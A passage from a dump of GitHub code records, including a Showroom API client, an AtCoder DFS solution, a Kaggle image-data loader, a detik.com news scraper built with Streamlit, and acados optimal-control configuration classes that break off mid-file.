int\n :param num: Amount of items to throw.\n :type num: int\n \"\"\"\n result = None\n try:\n resp = self._query_gifting_point_use(live, gift_id, num)\n if resp is not None:\n result = resp.json()\n except Exception as err:\n log_error(err)\n\n return result\n\n def execute_lottery(self, lottery):\n \"\"\"\n Execute requested lottery.\n :param lottery: The lottery to play.\n :type lottery: string\n :returns: The JSON with the reply.\n :rtype: string\n \"\"\"\n result = None\n try:\n resp = self._query_lottery(lottery)\n if resp is not None:\n result = resp.json()\n if result.get('error') == 1:\n result = None\n except Exception as err:\n log_error(err)\n\n return result\n\n def update_user_avatar(self, avatar_id):\n \"\"\"\n Updates the user avatar.\n :param avatar_id: The id of the avatar to use.\n :type avatar_id: string\n :returns: The JSON with the reply.\n :rtype: string\n \"\"\"\n result = None\n try:\n resp = self._query_update_user_avatar(avatar_id)\n if resp is not None:\n result = resp.json()\n if result.get('error') == 1:\n result = None\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_room_profile(self, room):\n result = None\n try:\n resp = self._query_room_profile(room)\n if resp is not None:\n result = resp.json()\n except Exception as err:\n log_error(err)\n\n return result\n","repo_name":"rpgrca/srtools","sub_path":"srtools/manager/api/showroomapi.py","file_name":"showroomapi.py","file_ext":"py","file_size_in_byte":23071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"38446777027","text":"N = int(input())\n\nchild = [[] for _ in range(N)]\nfor i in range(N - 1):\n par = int(input()) - 1\n child[par].append(i + 1)\n\n\n# return i's salary\ndef dfs(i):\n my_child = child[i]\n if len(my_child) == 0:\n return 1\n else:\n max_s = -1\n min_s = float('inf')\n\n for ch in my_child:\n s = dfs(ch)\n if s > max_s:\n max_s = s\n if s < min_s:\n min_s = s\n\n return max_s + min_s + 1\n\n\nprint(dfs(0))\n","repo_name":"ET0024/AtCoder","sub_path":"ABC001~100/ABC026/C-4.py","file_name":"C-4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7301182217","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport random\r\nimport bson # conda install -c anaconda pymongo\r\nfrom skimage.data import imread\r\nimport scipy.misc as misc\r\nimport io\r\nimport os\r\nimport shutil\r\nimport time\r\nimport config\r\nimport helper\r\n\r\n\r\nclass Data():\r\n def __init__(self, logger):\r\n self.logger = logger\r\n \r\n self.train_data = []\r\n self.train_label = []\r\n\r\n self.eval_data = []\r\n self.eval_label = []\r\n\r\n self.test_data = []\r\n self.test_label = []\r\n\r\n def extract_train_data(self):\r\n helper.log(self.logger, '[data] Extracting and save train data into images ...')\r\n \r\n # Delete the current images \r\n if os.path.exists(config.processed_train_dir):\r\n shutil.rmtree(config.processed_train_dir)\r\n os.makedirs(config.processed_train_dir)\r\n time.sleep(1)\r\n \r\n # load and save new train images\r\n train_bson = bson.decode_file_iter(open(config.train_path, 'rb')) \r\n for c, d in enumerate(train_bson):\r\n product_id = d[config.key_product_id]\r\n category_id = d[config.key_category_id]\r\n helper.log(self.logger,' Product, Category: {0}, {1}'.format(product_id, category_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n picture_path = config.processed_train_dir + \\\r\n str(product_id) + '_' + \\\r\n str(category_id) + '_' + \\\r\n str(e) +'.png'\r\n misc.imsave(picture_path, picture)\r\n\r\n def extract_test_data(self):\r\n helper.log(self.logger, '[data] Extracting and save test data into images ...')\r\n \r\n # Delete the current images \r\n if os.path.exists(config.processed_test_dir):\r\n shutil.rmtree(config.processed_test_dir)\r\n os.makedirs(config.processed_test_dir)\r\n time.sleep(1)\r\n \r\n # load and save new train images\r\n test_bson = bson.decode_file_iter(open(config.test_path, 'rb')) \r\n for c, d in enumerate(test_bson):\r\n product_id = d[config.key_product_id]\r\n helper.log(self.logger, ' Product: {0}'.format(product_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n picture_path = config.processed_test_dir + \\\r\n str(product_id) + '_' + \\\r\n str(e) +'.png'\r\n misc.imsave(picture_path, picture)\r\n \r\n def read_train_data(self):\r\n helper.log(self.logger, '[data] Reading train data into arrays ...')\r\n \r\n del self.train_data[:]\r\n del self.train_label[:]\r\n \r\n del self.eval_data[:]\r\n del self.eval_label[:]\r\n \r\n # Load data into arrays\r\n train_bson = bson.decode_file_iter(open(config.train_example_path, 'rb'))\r\n for c, d in enumerate(train_bson):\r\n product_id = d[config.key_product_id]\r\n category_id = d[config.key_category_id]\r\n helper.log(self.logger, ' Product: {0}'.format(product_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n self.train_data.append(picture)\r\n self.train_label.append(category_id)\r\n \r\n # Divide data into train and eval data\r\n num_data = len(self.train_data)\r\n num_train = np.int(num_data * config.train_ratio)\r\n #num_eval = num_data - num_train\r\n \r\n train_indices = random.sample(range(num_data), num_train)\r\n eval_indices = [i for i in range(num_data) if i not in train_indices] \r\n\r\n self.eval_data = [self.train_data[i] for i in eval_indices]\r\n self.eval_label = [self.train_label[i] for i in eval_indices]\r\n \r\n self.train_data = [self.train_data[i] for i in train_indices]\r\n self.train_label = [self.train_label[i] for i in train_indices]\r\n\r\n self.train_data = np.asarray(self.train_data)\r\n self.train_label = np.asarray(self.train_label)\r\n self.eval_data = np.asarray(self.eval_data)\r\n self.eval_label = np.asarray(self.eval_label)\r\n \r\n helper.log(self.logger, '[data] Train data shape: {0}'.format(self.train_data.shape))\r\n helper.log(self.logger, '[data] Train label shape: {0}'.format(self.train_label.shape)) \r\n helper.log(self.logger, '[data] Eval data shape: {0}'.format(self.eval_data.shape))\r\n helper.log(self.logger, '[data] Eval label shape: {0}'.format(self.eval_label.shape))\r\n \r\n def read_test_data(self, data_path):\r\n #TBD\r\n pass\r\n\r\n def get_train_data(self):\r\n return self.train_data\r\n \r\n def get_train_label(self):\r\n return self.train_label\r\n \r\n def get_eval_data(self):\r\n return self.eval_data\r\n \r\n def get_eval_label(self):\r\n return self.eval_label\r\n \r\n def get_test_data(self):\r\n return self.test_data\r\n \r\n def get_test_label(self):\r\n return self.test_label\r\n","repo_name":"Cuongvn08/kaggle_cdiscount_image_classify","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30358476960","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 30 18:50:33 2021\r\n\r\n@author: 91994\r\n\"\"\"\r\ndef remove(string, n):\r\n first = string [ : n ]\r\n last = string [ n+1 : ]\r\n return first + last\r\nstring = input (\" Enter the string : \")\r\nn=int(input(\" Enter the index of the character to remove : \"))\r\nprint(\"string :\",str)\r\nprint(\"Modified string:\")\r\nprint(remove(str, n)) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Elizabethelu/python-lab","sub_path":"remove n^th index.py","file_name":"remove n^th index.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15186532639","text":"import httpx\nimport asyncio\nimport datetime\nimport pandas as pd\nimport streamlit as st\nfrom selectolax.parser import HTMLParser\n\nasync def parse_item(result):\n # Extract the title and URL of each search result item\n title = result.css_first('h2').text()\n url = result.css_first('a').attrs['href']\n category = result.css_first('span.category').text()\n date = result.css_first('span.date').text().lstrip(category)\n desc = result.css_first('span.box_text > p').text()\n content = await parse_content(url)\n return {\n 'title': title,\n 'url': url,\n 'category': category,\n 'date': date,\n 'desc': desc,\n 'content': content\n }\n\nasync def parse_content(url):\n async with httpx.AsyncClient() as client:\n try:\n response = await client.get(url, timeout=10.0)\n except httpx.TimeoutException:\n return {\"error\": f\"Sorry, unable to connect to {url}. \\nPlease try again.\"}\n\n parser = HTMLParser(response.text)\n contents = parser.css('div.detail__body-text > p')\n contents = [content.text() for content in contents]\n return \"\\n\".join(contents)\n\nasync def parse(url, params, headers):\n async with httpx.AsyncClient() as client:\n try:\n response = await client.get(url, params=params, headers=headers, timeout=10.0)\n except httpx.TimeoutException:\n st.error(f\"Sorry, unable to connect to {url}. \\nPlease try again.\")\n return\n\n parser = HTMLParser(response.text)\n\n # Extract the search result items from the HTML\n search_results = parser.css('article')\n\n # Extract the items in parallel using map and asyncio.gather\n items = await asyncio.gather(*[parse_item(result) for result in search_results])\n return items\n\n\nasync def main():\n url = \"https://www.detik.com/search/searchall?\"\n\n st.title(\"DETIKScraper\")\n\n keyword = st.text_input(\"Search keyword\")\n pages = int(st.text_input(\"Total Pages\", value=\"1\"))\n options = st.selectbox(\"Export to\", [\"CSV\", \"XLSX\", \"JSON\"])\n\n \n if st.button(\"Scrape\"):\n # Get the current date and time\n now = datetime.datetime.now()\n # Format the current date and time as a string\n formatted_date_time = now.strftime(\"%Y%m%d_%H%M%S\")\n\n params = {\n \"query\": keyword,\n \"page\": pages,\n }\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/244.178.44.111 Safari/537.36\",\n }\n\n # Scrape the first `pages` pages of search results asynchronously using map and asyncio.gather\n items = await asyncio.gather(*[parse(url, {**params, 'page': page}, headers) for page in range(1, pages + 1)])\n\n # Flatten the nested list of items\n items = [item for page_items in items for item in page_items]\n\n data = pd.DataFrame(items)\n data.index += 1\n\n st.dataframe(data)\n\n mime_types = {\n \"csv\": \"text/csv\",\n \"xlsx\": \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\",\n \"json\": \"application/json\",\n }\n mime_type = mime_types.get(options.lower())\n file_name = f\"{formatted_date_time}_{keyword}_{pages}.{options.lower()}\"\n st.download_button(\"Download Result\", data=data.to_csv(index=False), file_name=file_name, mime=mime_type)\n\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"karvanpy/DETIKNewsScraper","sub_path":"DETIKScraper.py","file_name":"DETIKScraper.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"23423535820","text":"import numpy as np\nimport json\nimport os\nimport sys\n\nclass ocp_nlp_dims:\n \"\"\"\n class containing the dimensions of the optimal control problem\n \"\"\"\n def __init__(self):\n self.__nx = None #: :math:`n_x` - number of states \n self.__nz = 0 #: :math:`n_z` - number of algebraic variables \n self.__nu = None #: :math:`n_u` - number of inputs \n self.__np = 0 #: :math:`n_p` - number of parameters \n self.__ny = None #: :math:`n_y` - number of residuals in Lagrange term \n self.__ny_e = None #: :math:`n_{y}^e` - number of residuals in Mayer term \n self.__npd = 0 #: :math:`n_{\\pi}` - dimension of the image of the inner nonlinear function in positive definite constraints \n self.__npd_e = 0 #: :math:`n_{\\pi}^e` - dimension of the image of the inner nonlinear function in positive definite constraints\n self.__nh = 0 #: :math:`n_h` - number of nonlinear constraints \n self.__nh_e = 0 #: :math:`n_{h}^e` - number of nonlinear constraints at t=T \n self.__nbx = 0 #: :math:`n_{b_x}` - number of state bounds \n self.__nbx_e = 0 #: :math:`n_{b_x}` - number of state bounds at t=T \n self.__nbu = 0 #: :math:`n_{b_u}` - number of input bounds \n self.__nsbx = 0 #: :math:`n_{{sb}_x}` - number of soft state bounds \n self.__nsbx_e = 0 #: :math:`n_{{sb}^e_{x}}` - number of soft state bounds at t=T \n self.__nsbu = 0 #: :math:`n_{{sb}_u}` - number of soft input bounds \n self.__nsh = 0 #: :math:`n_{{sb}_u}` - number of soft nonlinear constraints \n self.__nsh_e = 0 #: :math:`n_{{sb}_u}` - number of soft nonlinear constraints \n self.__ns = 0 #: :math:`n_{s}` - total number of slacks \n self.__ns_e = 0 #: :math:`n_{s}^e` - total number of slacks at t=T \n self.__ng = 0 #: :math:`n_{g}` - number of general polytopic constraints \n self.__ng_e = 0 #: :math:`n_{g}^e` - number of general polytopic constraints at t=T \n self.__N = None #: :math:`N` - prediction horizon \n\n @property\n def nx(self):\n return self.__nx\n\n @property\n def nz(self):\n return self.__nz\n\n @property\n def nu(self):\n return self.__nu\n\n @property\n def np(self):\n return self.__np\n\n @property\n def ny(self):\n return self.__ny\n\n @property\n def ny_e(self):\n return self.__ny_e\n\n @property\n def npd(self):\n return self.__npd\n\n @property\n def npd_e(self):\n return self.__npd_e\n\n @property\n def nh(self):\n return self.__nh\n\n @property\n def nh_e(self):\n return self.__nh_e\n\n @property\n def nbx(self):\n return self.__nbx\n\n @property\n def nbx_e(self):\n return self.__nbx_e\n\n @property\n def nbu(self):\n return self.__nbu\n\n @property\n def nsbx(self):\n return self.__nsbx\n\n @property\n def nsbx_e(self):\n return self.__nsbx\n\n @property\n def nsbu(self):\n return self.__nsbu\n\n @property\n def nsh(self):\n return self.__nsh\n\n @property\n def nsh_e(self):\n return self.__nsh_e\n\n @property\n def ns(self):\n return self.__ns\n\n @property\n def ns_e(self):\n return self.__ns_e\n\n @property\n def ng(self):\n return self.__ng\n\n @property\n def ng_e(self):\n return self.__ng_e\n\n @property\n def N(self):\n return self.__N\n\n @nx.setter\n def nx(self, nx):\n if type(nx) == int and nx > 0:\n self.__nx = nx\n else:\n raise Exception('Invalid nx value. Exiting.')\n\n @nz.setter\n def nz(self, nz):\n if type(nz) == int and nz > -1:\n self.__nz = nz\n else:\n raise Exception('Invalid nz value. Exiting.')\n\n @nu.setter\n def nu(self, nu):\n if type(nu) == int and nu > 0:\n self.__nu = nu\n else:\n raise Exception('Invalid nu value. Exiting.')\n\n @np.setter\n def np(self, np):\n if type(np) == int and np > -1:\n self.__np = np\n else:\n raise Exception('Invalid np value. Exiting.')\n\n @ny.setter\n def ny(self, ny):\n if type(ny) == int and ny > -1:\n self.__ny = ny\n else:\n raise Exception('Invalid ny value. Exiting.')\n\n @ny_e.setter\n def ny_e(self, ny_e):\n if type(ny_e) == int and ny_e > -1:\n self.__ny_e = ny_e\n else:\n raise Exception('Invalid ny_e value. Exiting.')\n\n @npd.setter\n def npd(self, npd):\n if type(npd) == int and npd > -1:\n self.__npd = npd\n else:\n raise Exception('Invalid npd value. Exiting.')\n\n @npd_e.setter\n def npd_e(self, npd_e):\n if type(npd_e) == int and npd_e > -1:\n self.__npd_e = npd_e\n else:\n raise Exception('Invalid npd_e value. Exiting.')\n\n @nh.setter\n def nh(self, nh):\n if type(nh) == int and nh > -1:\n self.__nh = nh\n else:\n raise Exception('Invalid nh value. Exiting.')\n\n @nh_e.setter\n def nh_e(self, nh_e):\n if type(nh_e) == int and nh_e > -1:\n self.__nh_e = nh_e\n else:\n raise Exception('Invalid nh_e value. Exiting.')\n\n @nbx.setter\n def nbx(self, nbx):\n if type(nbx) == int and nbx > -1:\n self.__nbx = nbx\n else:\n raise Exception('Invalid nbx value. Exiting.')\n\n @nbx_e.setter\n def nbx_e(self, nbx_e):\n if type(nbx_e) == int and nbx_e > -1:\n self.__nbx_e = nbx_e\n else:\n raise Exception('Invalid nbx_e value. Exiting.')\n\n @nbu.setter\n def nbu(self, nbu):\n if type(nbu) == int and nbu > -1:\n self.__nbu = nbu\n else:\n raise Exception('Invalid nbu value. Exiting.')\n\n @nsbx.setter\n def nsbx(self, nbx):\n if type(nsbx) == int and nsbx > -1:\n self.__nsbx = nsbx\n else:\n raise Exception('Invalid nsbx value. Exiting.')\n\n @nsbx_e.setter\n def nsbx_e(self, nbx_e):\n if type(nsbx_e) == int and nsbx_e > -1:\n self.__nsbx_e = nsbx_e\n else:\n raise Exception('Invalid nsbx_e value. Exiting.')\n\n @nsbu.setter\n def nsbu(self, nsbu):\n if type(nsbu) == int and nsbu > -1:\n self.__nsbu = nsbu\n else:\n raise Exception('Invalid nsbu value. Exiting.')\n\n @nsh.setter\n def nsh(self, nsh):\n if type(nsh) == int and nsh > -1:\n self.__nsh = nsh\n else:\n raise Exception('Invalid nsh value. Exiting.')\n\n @nsh_e.setter\n def nsh_e(self, nsh_e):\n if type(nsh_e) == int and nsh_e > -1:\n self.__nsh_e = nsh_e\n else:\n raise Exception('Invalid nsh_e value. Exiting.')\n\n @ns.setter\n def ns(self, ns):\n if type(ns) == int and ns > -1:\n self.__ns = ns\n else:\n raise Exception('Invalid ns value. Exiting.')\n\n @ns_e.setter\n def ns_e(self, ns_e):\n if type(ns_e) == int and ns_e > -1:\n self.__ns_e = ns_e\n else:\n raise Exception('Invalid ns_e value. Exiting.')\n\n @ng.setter\n def ng(self, ng):\n if type(ng) == int and ng > -1:\n self.__ng = ng\n else:\n raise Exception('Invalid ng value. Exiting.')\n\n @ng_e.setter\n def ng_e(self, ng_e):\n if type(ng_e) == int and ng_e > -1:\n self.__ng_e = ng_e\n else:\n raise Exception('Invalid ng_e value. Exiting.')\n\n @N.setter\n def N(self, N):\n if type(N) == int and N > 0:\n self.__N = N\n else:\n raise Exception('Invalid N value. Exiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass ocp_nlp_cost:\n \"\"\"\n class containing the description of the cost\n (linear least-squares cost for the time being) \n :math:`l(x,u,z) = || V_x x + V_u u + V_z z - y_{\\\\text{ref}}||^2_W`, \n :math:`m(x) = || V^e_x x - y_{\\\\text{ref}^e}||^2_{W^e}`\n \"\"\"\n def __init__(self):\n # Lagrange term\n self.__W = [] #: :math:`W` - weight matrix\n self.__Vx = [] #: :math:`V_x` - x matrix coefficient\n self.__Vu = [] #: :math:`V_u` - u matrix coefficient\n self.__Vz = [] #: :math:`V_z` - z matrix coefficient\n self.__yref = [] #: :math:`y_{\\text{ref}}` - reference\n self.__Zl = [] #: :math:`Z_l` - Hessian wrt lower slack \n self.__Zu = [] #: :math:`Z_u` - Hessian wrt upper slack \n self.__zl = [] #: :math:`z_l` - gradient wrt lower slack \n self.__zu = [] #: :math:`z_u` - gradient wrt upper slack \n # Mayer term\n self.__W_e = [] #: :math:`W^e` - weight matrix for Mayer term\n self.__Vx_e = [] #: :math:`V_x^e` - x matrix coefficient for Mayer term\n self.__yref_e = [] #: :math:`y_{\\text{ref}}^e` - reference for Mayer term\n self.__Zl_e = [] #: :math:`Z_l^e` - Hessian wrt lower slack for Mayer term\n self.__Zu_e = [] #: :math:`Z_u^e` - Hessian wrt upper slack for Mayer term\n self.__zl_e = [] #: :math:`z_l^e` - gradient wrt lower slack for Mayer term\n self.__zu_e = [] #: :math:`z_u^e` - gradient wrt upper slack for Mayer term\n\n # Lagrange term\n @property\n def W(self):\n return self.__W\n\n @property\n def Vx(self):\n return self.__Vx\n\n @property\n def Vu(self):\n return self.__Vu\n\n @property\n def Vz(self):\n return self.__Vz\n\n @property\n def yref(self):\n return self.__yref\n\n @property\n def Zl(self):\n return self.__Zl\n\n @property\n def Zu(self):\n return self.__Zu\n\n @property\n def zl(self):\n return self.__zl\n\n @property\n def zu(self):\n return self.__zu\n\n @W.setter\n def W(self, W):\n if type(W) == np.ndarray:\n self.__W = W\n else:\n raise Exception('Invalid W value. Exiting.')\n \n @Vx.setter\n def Vx(self, Vx):\n if type(Vx) == np.ndarray:\n self.__Vx = Vx\n else:\n raise Exception('Invalid Vx value. Exiting.')\n \n @Vu.setter\n def Vu(self, Vu):\n if type(Vu) == np.ndarray:\n self.__Vu = Vu\n else:\n raise Exception('Invalid Vu value. Exiting.')\n\n @Vz.setter\n def Vz(self, Vz):\n if type(Vz) == np.ndarray:\n self.__Vz = Vz\n else:\n raise Exception('Invalid Vz value. Exiting.')\n\n @yref.setter\n def yref(self, yref):\n if type(yref) == np.ndarray:\n self.__yref = yref\n else:\n raise Exception('Invalid yref value. Exiting.')\n\n @Zl.setter\n def Zl(self, Zl):\n if type(Zl) == np.ndarray:\n self.__Zl = Zl\n else:\n raise Exception('Invalid Zl value. Exiting.')\n\n @Zu.setter\n def Zu(self, Zu):\n if type(Zu) == np.ndarray:\n self.__Zu = Zu\n else:\n raise Exception('Invalid Zu value. Exiting.')\n\n @zl.setter\n def zl(self, zl):\n if type(zl) == np.ndarray:\n self.__zl = zl\n else:\n raise Exception('Invalid zl value. Exiting.')\n\n @zu.setter\n def zu(self, zu):\n if type(zu) == np.ndarray:\n self.__zu = zu\n else:\n raise Exception('Invalid zu value. Exiting.')\n\n # Mayer term\n @property\n def W_e(self):\n return self.__W_e\n\n @property\n def Vx_e(self):\n return self.__Vx_e\n\n @property\n def yref_e(self):\n return self.__yref_e\n\n @property\n def Zl_e(self):\n return self.__Zl_e\n\n @property\n def Zu_e(self):\n return self.__Zu_e\n\n @property\n def zl_e(self):\n return self.__zl_e\n\n @property\n def zu_e(self):\n return self.__zu_e\n\n @W_e.setter\n def W_e(self, W_e):\n if type(W_e) == np.ndarray:\n self.__W_e = W_e\n else:\n raise Exception('Invalid W_e value. Exiting.')\n \n @Vx_e.setter\n def Vx_e(self, Vx_e):\n if type(Vx_e) == np.ndarray:\n self.__Vx_e = Vx_e\n else:\n raise Exception('Invalid Vx_e value. Exiting.')\n\n @yref_e.setter\n def yref_e(self, yref_e):\n if type(yref_e) == np.ndarray:\n self.__yref_e = yref_e\n else:\n raise Exception('Invalid yref_e value. Exiting.')\n\n @Zl_e.setter\n def Zl_e(self, Zl_e):\n if type(Zl_e) == np.ndarray:\n self.__Zl_e = Zl_e\n else:\n raise Exception('Invalid Zl_e value. Exiting.')\n\n @Zu_e.setter\n def Zu_e(self, Zu_e):\n if type(Zu_e) == np.ndarray:\n self.__Zu_e = Zu_e\n else:\n raise Exception('Invalid Zu_e value. Exiting.')\n\n @zl_e.setter\n def zl_e(self, zl_e):\n if type(zl_e) == np.ndarray:\n self.__zl_e = zl_e\n else:\n raise Exception('Invalid zl_e value. Exiting.')\n\n @zu_e.setter\n def zu_e(self, zu_e):\n if type(zu_e) == np.ndarray:\n self.__zu_e = zu_e\n else:\n raise Exception('Invalid zu_e value. Exiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass ocp_nlp_constraints:\n \"\"\"\n class containing the description of the constraints\n \"\"\"\n def __init__(self):\n # bounds on x and u\n self.__lbx = [] #: :math:`\\underline{x}` - lower bounds on x\n self.__lbu = [] #: :math:`\\underline{u}` - lower bounds on u\n self.__ubx = [] #: :math:`\\bar{x}` - upper bounds on x \n self.__ubu = [] #: :math:`\\bar{u}` - upper bounds on u \n self.__idxbx = [] #: indexes of bounds on x (defines :math:`\\Pi_x`) \n self.__idxbu = [] #: indexes of bounds on u (defines :math:`\\Pi_u`)\n # bounds on x at t=T\n self.__lbx_e = [] #: :math:`\\underline{x}^e` - lower bounds on x at t=T \n self.__ubx_e = [] #: :math:`\\bar{x}^e` - upper bounds on x at t=T \n self.__idxbx_e = [] #: indexes for bounds on x at t=T (defines :math:`\\Pi_x^e`) \n # soft bounds on x and u\n self.__lsbx = [] #: soft lower bounds on x\n self.__lsbu = [] #: soft lower bounds on u\n self.__usbx = [] #: soft upper bounds on x \n self.__usbu = [] #: soft upper bounds on u \n self.__idxsbx = [] #: indexes of soft bounds on x \n self.__idxsbu = [] #: indexes of soft bounds on u\n # soft bounds on nonlinear constraints\n self.__lsh = [] #: soft lower bounds for nonlinear constraints \n self.__ush = [] #: soft upper bounds for nonlinear constraints \n self.__idxsh = [] #: indexes of soft nonlinear constraints \n # soft bounds on x and u at t=T\n self.__lsbx_e = [] #: soft lower bounds on x at t=T\n self.__usbx_e = [] #: soft upper bounds on x at t=T\n self.__idxsbx_e= [] #: indexes of soft bounds on x at t=T \n # soft bounds on nonlinear constraints\n self.__lsh_e = [] #: soft lower bounds for nonlinear constraints \n self.__ush_e = [] #: soft upper bounds for nonlinear constraints \n self.__idxsh_e = [] #: indexes of soft nonlinear constraints at t=T \n # polytopic constraints \n self.__lg = [] #: :math:`\\underline{c}` - lower bound for general polytopic inequalities \n self.__ug = [] #: :math:`\\bar{c}` - upper bound for general polytopic inequalities \n self.__D = [] #: :math:`D` - D matrix in lg <= D * u + C * x <= ug\n self.__C = [] #: :math:`C` - C matrix in lg <= D * u + C * x <= ug\n # polytopic constraints at t=T \n self.__C_e = [] #: :math:`C^e` - C matrix at t=T \n self.__lg_e = [] #: :math:`\\underline{c}^e` - lower bound on general polytopic inequalities at t=T \n self.__ug_e = [] #: :math:`\\bar{c}^e` - upper bound on general polytopic inequalities at t=T \n # nonlinear constraints\n self.__lh = [] #: :math:`\\underline{h}` - lower bound for nonlinear inequalities \n self.__uh = [] #: :math:`\\bar{h}` - upper bound for nonlinear inequalities \n # nonlinear constraints at t=T\n self.__uh_e = [] #: :math:`\\bar{h}^e` - upper bound on nonlinear inequalities at t=T \n self.__lh_e = [] #: :math:`\\underline{h}^e` - lower bound on nonlinear inequalities at t=T \n self.__x0 = [] #: :math:`\\bar{x}_0` - initial state \n self.__p = [] #: :math:`p` - parameters \n\n @property\n def lbx(self):\n return self.__lbx\n\n @property\n def lbu(self):\n return self.__lbu\n \n @property\n def ubx(self):\n return self.__ubx\n\n @property\n def ubu(self):\n return self.__ubu\n\n @property\n def idxbx(self):\n return self.__idxbx\n\n @property\n def idxbu(self):\n return self.__idxbu\n\n @property\n def lsbx(self):\n return self.__lsbx\n\n @property\n def lsbu(self):\n return self.__lsbu\n \n @property\n def usbx(self):\n return self.__usbx\n\n @property\n def usbu(self):\n return self.__usbu\n\n @property\n def idxsbx(self):\n return self.__idxsbx\n\n @property\n def idxsbu(self):\n return self.__idxsbu\n\n @property\n def lsh(self):\n return self.__lsh\n\n @property\n def ush(self):\n return self.__ush\n\n @property\n def idxsh(self):\n return self.__idxsh\n\n\n @property\n def lsbx_e(self):\n return self.__lsbx_e\n\n @property\n def usbx_e(self):\n return self.__usbx_e\n\n @property\n def idxsbx_e(self):\n return self.__idxsbx_e\n\n @property\n def lsh_e(self):\n return self.__lsh_e\n\n @property\n def ush_e(self):\n return self.__ush_e\n\n @property\n def idxsh_e(self):\n return self.__idxsh_e\n\n @property\n def lg(self):\n return self.__lg\n\n @property\n def ug(self):\n return self.__ug\n\n @property\n def lh(self):\n return self.__lh\n\n @property\n def uh(self):\n return self.__uh\n\n @property\n def D(self):\n return self.__D\n\n @property\n def C(self):\n return self.__C\n\n @property\n def lbx_e(self):\n return self.__lbx_e\n\n @property\n def ubx_e(self):\n return self.__ubx_e\n\n @property\n def idxbx_e(self):\n return self.__idxbx_e\n\n @property\n def C_e(self):\n return self.__C_e\n\n @property\n def lg_e(self):\n return self.__lg_e\n\n @property\n def ug_e(self):\n return self.__ug_e\n\n @property\n def lg_e(self):\n return self.__lg_e\n\n @property\n def ug_e(self):\n return self.__ug_e\n\n @property\n def x0(self):\n return self.__x0\n\n @property\n def p(self):\n return self.__p\n\n @lbx.setter\n def lbx(self, lbx):\n if type(lbx) == np.ndarray:\n self.__lbx = lbx\n else:\n raise Exception('Invalid lbx value. Exiting.')\n\n @ubx.setter\n def ubx(self, ubx):\n if type(ubx) == np.ndarray:\n self.__ubx = ubx\n else:\n raise Exception('Invalid ubx value. Exiting.')\n\n @idxbx.setter\n def idxbx(self, idxbx):\n if type(idxbx) == np.ndarray:\n self.__idxbx = idxbx\n else:\n raise Exception('Invalid idxbx value. Exiting.')\n\n @lbu.setter\n def lbu(self, lbu):\n if type(lbu) == np.ndarray:\n self.__lbu = lbu\n else:\n raise Exception('Invalid lbu value. Exiting.')\n\n @ubu.setter\n def ubu(self, ubu):\n if type(ubu) == np.ndarray:\n self.__ubu = ubu\n else:\n raise Exception('Invalid ubu value. Exiting.')\n \n @idxbu.setter\n def idxbu(self, idxbu):\n if type(idxbu) == np.ndarray:\n self.__idxbu = idxbu\n else:\n raise Exception('Invalid idxbu value. Exiting.')\n\n @lsbx.setter\n def lsbx(self, lsbx):\n if type(lsbx) == np.ndarray:\n self.__lsbx = lsbx\n else:\n raise Exception('Invalid lsbx value. Exiting.')\n\n @usbx.setter\n def usbx(self, usbx):\n if type(usbx) == np.ndarray:\n self.__usbx = usbx\n else:\n raise Exception('Invalid usbx value. Exiting.')\n\n @idxsbx.setter\n def idxsbx(self, idxsbx):\n if type(idxsbx) == np.ndarray:\n self.__idxsbx = idxsbx\n else:\n raise Exception('Invalid idxsbx value. Exiting.')\n\n @lsbu.setter\n def lsbu(self, lsbu):\n if type(lsbu) == np.ndarray:\n self.__lsbu = lsbu\n else:\n raise Exception('Invalid lsbu value. Exiting.')\n\n @usbu.setter\n def usbu(self, usbu):\n if type(usbu) == np.ndarray:\n self.__usbu = usbu\n else:\n raise Exception('Invalid usbu value. Exiting.')\n \n @idxsbu.setter\n def idxsbu(self, idxsbu):\n if type(idxsbu) == np.ndarray:\n self.__idxsbu = idxsbu\n else:\n raise Exception('Invalid idxsbu value. Exiting.')\n\n @lsh.setter\n def lsh(self, lsh):\n if type(lsh) == np.ndarray:\n self.__lsh = lsh\n else:\n raise Exception('Invalid lsh value. Exiting.')\n\n @ush.setter\n def ush(self, ush):\n if type(ush) == np.ndarray:\n self.__ush = ush\n else:\n raise Exception('Invalid ush value. Exiting.')\n\n @idxsh.setter\n def idxsh(self, idxsh):\n if type(idxsh) == np.ndarray:\n self.__idxsh = idxsh\n else:\n raise Exception('Invalid idxsh value. Exiting.')\n\n @lsbx_e.setter\n def lsbx_e(self, lsbx_e):\n if type(lsbx_e) == np.ndarray:\n self.__lsbx_e = lsbx_e\n else:\n raise Exception('Invalid lsbx_e value. Exiting.')\n\n @usbx_e.setter\n def usbx_e(self, usbx_e):\n if type(usbx_e) == np.ndarray:\n self.__usbx_e = usbx_e\n else:\n raise Exception('Invalid usbx_e value. Exiting.')\n\n @idxsbx_e.setter\n def idxsbx_e(self, idxsbx_e):\n if 